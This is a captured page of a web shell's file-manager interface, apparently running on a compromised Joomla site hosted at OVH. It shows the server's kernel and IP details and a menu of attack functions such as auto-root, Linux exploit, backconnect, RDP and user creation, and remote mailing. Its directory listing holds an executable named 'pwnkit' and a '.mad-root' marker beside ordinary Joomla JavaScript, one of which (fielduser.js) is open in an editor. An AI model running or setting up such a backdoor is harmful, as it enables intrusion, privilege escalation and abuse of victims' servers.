Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
genieprevention /
media /
jui /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
ajax-chosen.js
4.37
KB
-rw-r--r--
ajax-chosen.min.js
2.75
KB
-rw-r--r--
bootstrap-tooltip-extended.js
5.76
KB
-rw-r--r--
bootstrap-tooltip-extended.min...
2.42
KB
-rw-r--r--
bootstrap.js
62.68
KB
-rw-r--r--
bootstrap.min.js
28.44
KB
-rw-r--r--
chosen.jquery.js
46.81
KB
-rw-r--r--
chosen.jquery.min.js
33.44
KB
-rw-r--r--
cms-uncompressed.js
7.6
KB
-rw-r--r--
cms.js
2.12
KB
-rw-r--r--
fielduser.js
4.17
KB
-rw-r--r--
fielduser.min.js
2.35
KB
-rw-r--r--
html5-uncompressed.js
10.09
KB
-rw-r--r--
html5.js
2.67
KB
-rw-r--r--
icomoon-lte-ie7.js
9.64
KB
-rw-r--r--
jquery-migrate.js
22.95
KB
-rw-r--r--
jquery-migrate.min.js
9.82
KB
-rw-r--r--
jquery-noconflict.js
21
B
-rw-r--r--
jquery.autocomplete.js
33.73
KB
-rw-r--r--
jquery.autocomplete.min.js
12.78
KB
-rw-r--r--
jquery.js
287
KB
-rw-r--r--
jquery.min.js
94.34
KB
-rw-r--r--
jquery.minicolors.js
40.27
KB
-rw-r--r--
jquery.minicolors.min.js
15.08
KB
-rw-r--r--
jquery.searchtools.js
10.54
KB
-rw-r--r--
jquery.searchtools.min.js
7.4
KB
-rw-r--r--
jquery.simplecolors.js
5.83
KB
-rw-r--r--
jquery.simplecolors.min.js
3.02
KB
-rw-r--r--
jquery.ui.core.js
43.73
KB
-rw-r--r--
jquery.ui.core.min.js
20.72
KB
-rw-r--r--
jquery.ui.sortable.js
39.51
KB
-rw-r--r--
jquery.ui.sortable.min.js
23.85
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
sortablelist.js
9.39
KB
-rw-r--r--
treeselectmenu.jquery.js
3.42
KB
-rw-r--r--
treeselectmenu.jquery.min.js
2.57
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : fielduser.js
/** * @copyright Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE.txt */ /** * Field user */ ;(function($){ 'use strict'; $.fieldUser = function(container, options){ // Merge options with defaults this.options = $.extend({}, $.fieldUser.defaults, options); // Set up elements this.$container = $(container); this.$modal = this.$container.find(this.options.modal); this.$modalBody = this.$modal.children('.modal-body'); this.$input = this.$container.find(this.options.input); this.$inputName = this.$container.find(this.options.inputName); this.$buttonSelect = this.$container.find(this.options.buttonSelect); // Bind events this.$buttonSelect.on('click', this.modalOpen.bind(this)); this.$modal.on('hide', this.removeIframe.bind(this)); // Check for onchange callback, var onchangeStr = this.$input.attr('data-onchange'), onchangeCallback; if(onchangeStr) { onchangeCallback = new Function(onchangeStr); this.$input.on('change', onchangeCallback.bind(this.$input)); } }; // display modal for select the file $.fieldUser.prototype.modalOpen = function() { var $iframe = $('<iframe>', { name: 'field-user-modal', src: this.options.url.replace('{field-user-id}', this.$input.attr('id')), width: this.options.modalWidth, height: this.options.modalHeight }); this.$modalBody.append($iframe); this.$modal.modal('show'); $('body').addClass('modal-open'); var self = this; // save context $iframe.load(function(){ var content = $(this).contents(); // handle value select content.on('click', '.button-select', function(){ self.setValue($(this).data('user-value'), $(this).data('user-name')); self.modalClose(); $('body').removeClass('modal-open'); }); }); }; // close modal $.fieldUser.prototype.modalClose = function() { this.$modal.modal('hide'); this.$modalBody.empty(); $('body').removeClass('modal-open'); }; // close modal $.fieldUser.prototype.removeIframe = function() { this.$modalBody.empty(); $('body').removeClass('modal-open'); }; // set the value $.fieldUser.prototype.setValue = function(value, name) { this.$input.val(value).trigger('change'); this.$inputName.val(name || value).trigger('change'); }; // default options $.fieldUser.defaults = { buttonSelect: '.button-select', // selector for button to change the value input: '.field-user-input', // selector for the input for the user id inputName: '.field-user-input-name', // selector for the input for the user name modal: '.modal', // modal selector url : 'index.php?option=com_users&view=users&layout=modal&tmpl=component', modalWidth: '100%', // modal width modalHeight: '300px' // modal height }; $.fn.fieldUser = function(options){ return this.each(function(){ var $el = $(this), instance = $el.data('fieldUser'); if(!instance){ var options = options || {}, data = $el.data(); // Check options in the element for (var p in data) { if (data.hasOwnProperty(p)) { options[p] = data[p]; } } instance = new $.fieldUser(this, options); $el.data('fieldUser', instance); } }); }; // Initialise all defaults on load and again when subform rows are added $(function($) { initUserField(); $(document).on('subform-row-add', initUserField); function initUserField (event, container) { $(container || document).find('.field-user-wrapper').fieldUser(); } }); })(jQuery); // Compatibility with mootools modal layout function jSelectUser(element) { var $el = jQuery(element), value = $el.data('user-value'), name = $el.data('user-name'), fieldId = $el.data('user-field'), $inputValue = jQuery('#' + fieldId + '_id'), $inputName = jQuery('#' + fieldId); if (!$inputValue.length) { // The input not found return; } // Update the value $inputValue.val(value).trigger('change'); $inputName.val(name || value).trigger('change'); // Check for onchange callback, var onchangeStr = $inputValue.attr('data-onchange'), onchangeCallback; if(onchangeStr) { onchangeCallback = new Function(onchangeStr); onchangeCallback.call($inputValue[0]); } jModalClose(); }
Close